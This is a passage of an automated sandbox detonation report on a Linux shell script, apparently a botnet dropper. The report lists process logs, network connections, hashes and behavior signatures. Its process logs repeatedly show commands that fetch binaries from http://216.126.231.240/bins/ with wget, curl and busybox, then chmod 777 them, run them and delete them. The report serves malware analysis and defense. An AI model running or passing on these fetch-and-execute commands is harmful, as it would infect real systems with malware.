/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 02:53

Reported

2024-11-14 02:56

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

41s

Max time network

129s

Command Line

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A

Processes

/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

